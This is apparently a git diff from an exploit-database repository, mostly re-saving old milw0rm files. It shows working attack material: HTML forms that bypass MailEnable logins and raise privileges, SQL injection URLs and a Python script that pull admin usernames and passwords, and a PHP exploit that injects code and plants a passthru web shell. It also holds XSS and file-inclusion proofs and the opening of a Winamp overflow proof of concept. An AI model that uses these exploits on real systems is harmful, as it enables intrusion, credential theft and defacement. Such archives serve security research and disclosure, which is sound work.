1) - Any user can login to web administration site.
2) - Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!
3) - Every one (ever no authenticated user) can write a message in "Draft" folder of any users!
4) - Every one can make "myupload.ams" on server in "drafts" folder of every user!
5) - Every one can make "_myupload.csv" on server in "drafts" folder of every user!
6) - For changing password it need the current password but current password is mention in source of "ListAttachments.asp" file, if XSS attack or Session hijacking happened then attacker can gain the user's current password.
Details' Descriptions:
1)
Any user can login to web administration site with bug in "main.asp" (Enterprise)
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/meadmin/enterprise/lang/EN/main.asp" METHOD="POST">
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="postmaster"><br>
<input type=submit>
</FORM>
-----------------------End----------------------------
2)
Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!
Bug in "MailOptions.asp" file: remote authenticated user can change value of hidden field (name="LoginRights")
from "USER" to "ADMIN" or "SYSADMIN" and change it's level to up! or change value of hidden field
(name="LoginStatus") to "0" to disable him/her account!
Proof's exploit:
-----------------------Start--------------------------
<FORM METHOD="post" ACTION="http://[URL]/MEWebMail/base/default/lang/EN/MailOptions.asp?SelectedIndex=1&FormAction=Edit">
<TABLE BORDER="0">
<TR><TD>Current Password:</TD><TD><INPUT name=LoginPassword VALUE=""></TD></TR>
<TR><TD>New Password:</TD><TD><INPUT name=NewLoginPassword VALUE=""></TD></TR>
<TR><TD>Confirm New Password:</TD><TD><INPUT name=ConfirmNewLoginPassword VALUE=""></TD></TR>
</TABLE>
<INPUT NAME="LoginDescription" VALUE="Login description">
<INPUT NAME="LoginRights" VALUE="SYSADMIN">
<INPUT NAME="LoginStatus" VALUE="1">
<BR><BR>
<INPUT type=submit value="UpTime!">
</FORM>
-----------------------End----------------------------
3)
Every one (ever no authenticated user) can write a message in "Draft" folder of any users!
Bug in "Resolve.asp" file: this file don't check authenticated user!
Proof's exploit:
--------------Start---------------------
<FORM METHOD="post" ACTION="http://[url]/MEWebMail/base/default/lang/EN/Forms/MAI/Resolve.asp">
<TABLE BORDER="0">
<TR><TD>ME_MAILBOX:</TD><TD><INPUT name=ME_MAILBOX VALUE=""></TD></TR>
<TR><TD>ME_POSTOFFICE:</TD><TD><INPUT name=ME_POSTOFFICE VALUE=""></TD></TR>
<TR><TD>Folder:</TD><TD><INPUT name=Folder VALUE=""></TD></TR>
<TR><TD>ID:</TD><TD><INPUT name=ID VALUE=""></TD></TR>
<TR><TD>ComposeMode:</TD><TD><INPUT name=ComposeMode VALUE="General"></TD></TR>
<TR><TD>MsgFrom:</TD><TD><INPUT name=MsgFrom VALUE=""></TD></TR>
<TR><TD>MsgCc:</TD><TD><INPUT name=MsgCc VALUE=""></TD></TR>
<TR><TD>MsgTo:</TD><TD><INPUT name=MsgTo VALUE=""></TD></TR>
<TR><TD>MsgBCC:</TD><TD><INPUT name=MsgBCC VALUE=""></TD></TR>
<TR><TD>MsgBody:</TD><TD><INPUT name=MsgBody VALUE=""></TD></TR>
<TR><TD>MsgSubject:</TD><TD><INPUT name=MsgSubject VALUE=""></TD></TR>
</TABLE>
<BR><BR>
<INPUT type=submit value="Update" CLASS=ME_Button>
</FORM>
--------------End---------------------
4)
Make "myupload.ams" on server in "drafts" folder of every user!
Show Mail Enable folder's path if "username" or "postoffices" be incorrect!
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/default/lang/EN/Forms/MAI/UploadAttachment.asp" ENCTYPE="multipart/form-data" METHOD="POST">
MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test"><br>
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
ID<INPUT NAME=ID TYPE="text" VALUE="test"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------
5)
Make "_myupload.csv" on server in "drafts" folder of every user!
Show Mail Enable folder's path if "username" or "postoffices" be incorrect!
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/enterprise/lang/EN/Forms/vcf/uploadcontact.asp" ENCTYPE="multipart/form-data" METHOD="POST">
MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test123"><br>
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
ID<INPUT NAME=ID TYPE="text" VALUE="test123"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------
6)
Have password in source.
Proof:
-----------------------Start--------------------------
http://[URL]/MEWebmail/base/enterprise/lang/EN/Forms/MAI/ListAttachments.asp?Mode=Compose&ID=test.MAI&MsgFormat=HTML&FormAction=Send&ComposeMode=General&Folder=%5CDrafts
-----------------------End----------------------------
Product name: MailEnable Enterprise Edition
Version: All ASP version <= 2.0
URL: www.mailenable.com
Finder: Soroush Dalili
Team: GSG [Grayhatz.net]
Country: Iran
Site: Grayhatz.net
Email: IRSDL[a.t]Yahoo[d0t]Com
<< I hope secure world for all >>
# milw0rm.com [2006-06-09]

48
platforms/asp/webapps/2150.txt
View file

@ -1,24 +1,24 @@
# CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version) SQL Injection Vulnerability
# Risk : High
# Credit : ASIANEAGLE
# Contact: admin@asianeagle.org
# Web : www.asianeagle.org
# Download Link : http://www.aspindir.com/Kategoriler/asp/portal-&-hazir-site/?P=7&K=&T=
#Exploit:
Note : User Logins Must Be Enabled By Admin To Exploit This Vulnerability
#Admin Nick: http://[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
#Admin Password :http::[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_SIFRE,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
after login as user;
#Admin Nick : http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_ADI,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
#Admin Password: http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_SIFRE,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
#Forever milw0rm ;)
# milw0rm.com [2006-08-08]
# CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version) SQL Injection Vulnerability
# Risk : High
# Credit : ASIANEAGLE
# Contact: admin@asianeagle.org
# Web : www.asianeagle.org
# Download Link : http://www.aspindir.com/Kategoriler/asp/portal-&-hazir-site/?P=7&K=&T=
#Exploit:
Note : User Logins Must Be Enabled By Admin To Exploit This Vulnerability
#Admin Nick: http://[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
#Admin Password :http::[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_SIFRE,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
after login as user;
#Admin Nick : http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_ADI,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
#Admin Password: http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_SIFRE,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
#Forever milw0rm ;)
# milw0rm.com [2006-08-08]

108
platforms/asp/webapps/4824.py
View file

@ -1,54 +1,54 @@
#!/usr/bin/python
#oneSCHOOL admin/login.asp SQL Injection explot (for all versions)
#by Guga360.
import urllib
from sys import argv
query = {'txtOperation':'Login','txtLoginID':"""
' union select min(LoginName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName>'a'--""",'txtPassword':'x','btnSubmit':'L+O+G+I+N+%3E%3E'}
queryx = urllib.urlencode(query)
if len(argv)<>2:
print """
**********
Usage:
oneSCHOOLxpl.py [host]
[+] Exploiting...
[+] User: admin
[+] Password: 123
*******************
"""
else:
try:
print '\n[+] Exploting...\n'
host = argv[1]
if host[0:7]<>'http://':
host = 'http://'+host
url = urllib.urlopen(host+'/admin/login.asp', queryx)
url = url.read()
url = url.split()
name = url.index('varchar')+2
name = url[name]
name = name.replace("'","")
print '[+] User: ' + name
query2 = query.copy()
query2['txtLoginID']="""' union select min(Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName='"""+name+"""'--"""
query2 = urllib.urlencode(query2)
url = urllib.urlopen(host+'/admin/login.asp', query2)
url = url.read()
url = url.split()
passw = url.index('varchar')+2
passw = url[passw]
passw = passw.replace("'","")
print '[+] Pass: '+passw
except:
print '[+] Not vulnerable!'
# milw0rm.com [2007-12-31]
#!/usr/bin/python
#oneSCHOOL admin/login.asp SQL Injection explot (for all versions)
#by Guga360.
import urllib
from sys import argv
query = {'txtOperation':'Login','txtLoginID':"""
' union select min(LoginName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName>'a'--""",'txtPassword':'x','btnSubmit':'L+O+G+I+N+%3E%3E'}
queryx = urllib.urlencode(query)
if len(argv)<>2:
print """
**********
Usage:
oneSCHOOLxpl.py [host]
[+] Exploiting...
[+] User: admin
[+] Password: 123
*******************
"""
else:
try:
print '\n[+] Exploting...\n'
host = argv[1]
if host[0:7]<>'http://':
host = 'http://'+host
url = urllib.urlopen(host+'/admin/login.asp', queryx)
url = url.read()
url = url.split()
name = url.index('varchar')+2
name = url[name]
name = name.replace("'","")
print '[+] User: ' + name
query2 = query.copy()
query2['txtLoginID']="""' union select min(Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName='"""+name+"""'--"""
query2 = urllib.urlencode(query2)
url = urllib.urlopen(host+'/admin/login.asp', query2)
url = url.read()
url = url.split()
passw = url.index('varchar')+2
passw = url[passw]
passw = passw.replace("'","")
print '[+] Pass: '+passw
except:
print '[+] Not vulnerable!'
# milw0rm.com [2007-12-31]

6
platforms/linux/dos/371.c
View file

@ -68,6 +68,6 @@ write(x,buf,strlen(buf));
printf("done!\n");
close(x);
}
// milw0rm.com [2004-08-02]
}
// milw0rm.com [2004-08-02]

6
platforms/linux/dos/842.c
View file

@ -132,6 +132,6 @@ while(1)
exit(1);
}
return 0;
}
// milw0rm.com [2005-02-25]
}
// milw0rm.com [2005-02-25]

2
platforms/linux/local/9435.txt
View file

@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4
*/
http://www.grsecurity.net/~spender/wunderbar_emporium.tgz
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
# milw0rm.com [2009-08-14]

2
platforms/linux/local/9436.txt
View file

@ -4,6 +4,6 @@
Quick and dirty exploit for this one:
http://www.frasunek.com/proto_ops.tgz
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
# milw0rm.com [2009-08-14]

6
platforms/linux/remote/74.c
View file

@ -679,6 +679,6 @@ void banrl()
fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}
/* eoc */
// milw0rm.com [2003-08-03]
/* eoc */
// milw0rm.com [2003-08-03]

6
platforms/linux/remote/78.c
View file

@ -923,6 +923,6 @@ int check_exp(int sock)
else return(FAD);
}
/* eoc */
// milw0rm.com [2003-08-11]
/* eoc */
// milw0rm.com [2003-08-11]

6
platforms/multiple/dos/1072.cpp
View file

@ -213,6 +213,6 @@ void flood(void *id) {
Sleep(delay);
}
}
// milw0rm.com [2005-06-27]
}
// milw0rm.com [2005-06-27]

20
platforms/php/webapps/1878.txt
View file

@ -1,10 +1,10 @@
# Particle wiki <= 1.0.2 Remote SQL_Injection - Username/Password(hash) Extractor
# Thanks to UNSECURED SYSTEMS : http://pridels.blogspot.com/2006/06/particle-wiki-sql-inj.html
# Exploited by FarhadKey from http://www.kapda.ir
Username :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,username%20from%20pwiki_users%20/*
Password :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,password%20from%20pwiki_users%20/*
# milw0rm.com [2006-06-05]
# Particle wiki <= 1.0.2 Remote SQL_Injection - Username/Password(hash) Extractor
# Thanks to UNSECURED SYSTEMS : http://pridels.blogspot.com/2006/06/particle-wiki-sql-inj.html
# Exploited by FarhadKey from http://www.kapda.ir
Username :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,username%20from%20pwiki_users%20/*
Password :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,password%20from%20pwiki_users%20/*
# milw0rm.com [2006-06-05]

13
platforms/php/webapps/37337.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/53740/info
WHMCS is prone to a cross-site scripting vulnerability and multiple HTML-parameter-pollution vulnerabilities because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the page is rendered to the user, and override existing hard-coded HTTP parameters which compromises the application.
WHMCS 5.0 is vulnerable; other versions may also be affected.
http://www.example.com/cart.php?a=add&domain=transfer&n913620=v992636
http://www.example.com/domainchecker.php?search=bulkregister&n946774=v992350
http://www.example.com/cart.php?currency=2&gid=1&n972751=v976696

9
platforms/php/webapps/37338.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53740/info
WHMCS is prone to a cross-site scripting vulnerability and multiple HTML-parameter-pollution vulnerabilities because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the page is rendered to the user, and override existing hard-coded HTTP parameters which compromises the application.
WHMCS 5.0 is vulnerable; other versions may also be affected.
http://www.example.com/knowledgebase.php?action = [XSS]

9
platforms/php/webapps/37339.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53759/info
VoipNow Professional is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
VoipNow Professional 2.5.3 is vulnerable; other versions may also be vulnerable.
http://www.example.com/index.php?nsextt=[xss]

20
platforms/php/webapps/37340.html Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/53761/info
TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
TinyCMS 1.3 is vulnerable; other versions may also be affected.
<form action='http://www.example.com/inc/functions.php?view=admin&do=pages&create=new&save=1' method='post'>
<strong>Page Title :</strong>
<input type="text" name="title" size="50" value='Happy Milw0rm 1337day !'>
<textarea id="elm1" name="page">
<center>
<h1> HaCked By KedAns-Dz </h1>
<h2> Happy Milw0rm 1337-Day All Hax0rS ^.^ </h2>
<h3> Greetings t0 KeyStr0ke + JF and All 0ld School ( The Milw0rm ) </h3>
</center>
&lt;/textarea&gt;
<input type='submit' value='Upload Page'>
</form>

12
platforms/php/webapps/37341.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/53761/info
TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
TinyCMS 1.3 is vulnerable; other versions may also be affected.
<form action='http://www.example.com/index.php?page=../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Get/Include Local File'>
</form>

11
platforms/php/webapps/37342.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/53761/info
TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
TinyCMS 1.3 is vulnerable; other versions may also be affected.
<form action='http://www.example.com/admin/admin.php?view=admin&do=../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Get/Include Local File'>
</form>

388
platforms/php/webapps/4004.php
View file

@ -1,194 +1,194 @@
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
Inout Search Engine (all version) Remote Code Execution Exploit
by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>
Thanks to rgod for the php code and Marty for the Love
";
if ($argc<3) {
echo "Usage: php ".$argv[0]." Host Path cmd
Host: target server (ip/hostname)
Path: path of inoutsearchengine
cmd: a Shell command
Example:
php ".$argv[0]." localhost /inoutsearchengine/ dir";
die;
}
/*
Vuln Explanation:
Take a look on one of the admin files, the begin should be something like this:
<?php
include("config.inc.php");
if(!isset($_COOKIE['admin']))
{
header("Location:index.php");
}
?>
this is not a protection for two reasons:
i) everyone can make a cookie with false credentials
ii) there isn't any exit or die function after header('Location: index.php')
Now look at create engine.php, and you find that there isn't any parse of the
text you send as the engine name..
Besides that the names of the tabs are written into a PHP files to make faster
the loading process.. the only limit we have while we inject the code is taht we
can't put spaces in the code, otherwise php will end with an error..
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$cmd.=" ".$argv[$i];
}
$cmd=urlencode($cmd);
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "- Injecting Shell Creator..\r\n";
/*
It was too simple to inject directly the shell into the file..
Let's make the process longer :P
*/
$data="term=<?eval(base64_decode(\$_POST[shell]));?>&Submit=Create+New+Engine+%21+&spl=term";
$packet="POST ".$p."admin/create_engine.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."admin/create_engine.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "- refreshing data file..\r\n";
$packet="GET ".$p."admin/generate_tabs.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
echo "- Creating the real Shell..\r\n";
/*
Costumize it as you want..
*/
$my_shell = base64_encode('$fp=fopen(\'piggy_marty.php\',\'w\');
fputs($fp,\'<?php error_reporting(0);
set_time_limit(0);
if (get_magic_quotes_gpc()) {
$_GET[cmd]=stripslashes($_GET[cmd]);
}
echo 666999;
passthru($_GET[cmd]);
echo 666999;
?>\');
fclose($fp);
chmod(\'piggy_marty.php\',777);');
$data="shell=$my_shell";
$packet="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "StepX - Executing Shell..\r\n";
$packet="GET ".$p."piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=$cmd\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"666999"))
{
echo "Exploit succeeded...\r\n";
$temp=explode("666999",$html);
die("\r\n".$temp[1]."\r\n");
}
# Coded With BH Fast Generator v0.1
?>
# milw0rm.com [2007-05-29]
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
Inout Search Engine (all version) Remote Code Execution Exploit
by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>
Thanks to rgod for the php code and Marty for the Love
";
if ($argc<3) {
echo "Usage: php ".$argv[0]." Host Path cmd
Host: target server (ip/hostname)
Path: path of inoutsearchengine
cmd: a Shell command
Example:
php ".$argv[0]." localhost /inoutsearchengine/ dir";
die;
}
/*
Vuln Explanation:
Take a look on one of the admin files, the begin should be something like this:
<?php
include("config.inc.php");
if(!isset($_COOKIE['admin']))
{
header("Location:index.php");
}
?>
this is not a protection for two reasons:
i) everyone can make a cookie with false credentials
ii) there isn't any exit or die function after header('Location: index.php')
Now look at create engine.php, and you find that there isn't any parse of the
text you send as the engine name..
Besides that the names of the tabs are written into a PHP files to make faster
the loading process.. the only limit we have while we inject the code is taht we
can't put spaces in the code, otherwise php will end with an error..
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$cmd.=" ".$argv[$i];
}
$cmd=urlencode($cmd);
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "- Injecting Shell Creator..\r\n";
/*
It was too simple to inject directly the shell into the file..
Let's make the process longer :P
*/
$data="term=<?eval(base64_decode(\$_POST[shell]));?>&Submit=Create+New+Engine+%21+&spl=term";
$packet="POST ".$p."admin/create_engine.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."admin/create_engine.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "- refreshing data file..\r\n";
$packet="GET ".$p."admin/generate_tabs.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
echo "- Creating the real Shell..\r\n";
/*
Costumize it as you want..
*/
$my_shell = base64_encode('$fp=fopen(\'piggy_marty.php\',\'w\');
fputs($fp,\'<?php error_reporting(0);
set_time_limit(0);
if (get_magic_quotes_gpc()) {
$_GET[cmd]=stripslashes($_GET[cmd]);
}
echo 666999;
passthru($_GET[cmd]);
echo 666999;
?>\');
fclose($fp);
chmod(\'piggy_marty.php\',777);');
$data="shell=$my_shell";
$packet="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "StepX - Executing Shell..\r\n";
$packet="GET ".$p."piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=$cmd\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"666999"))
{
echo "Exploit succeeded...\r\n";
$temp=explode("666999",$html);
die("\r\n".$temp[1]."\r\n");
}
# Coded With BH Fast Generator v0.1
?>
# milw0rm.com [2007-05-29]

136
platforms/windows/dos/1935.cpp
View file

@ -1,68 +1,68 @@
/*
* ********************************************** *
* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
* ********************************************** *
* PoC coded by: BassReFLeX *
* Date: 19 Jun 2006 *
* ********************************************** *
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void usage(char* file);
char header[] = "\x4D\x54\x68\x64\x00\x00"
"\x00\x06\x00\x00\x00\x01"
"\x00\x60\x4D\x54\x72\x6B"
"\x00\x00";
char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF";
int main(int argc,char* argv[])
{
system("cls");
printf("\n* ********************************************** *");
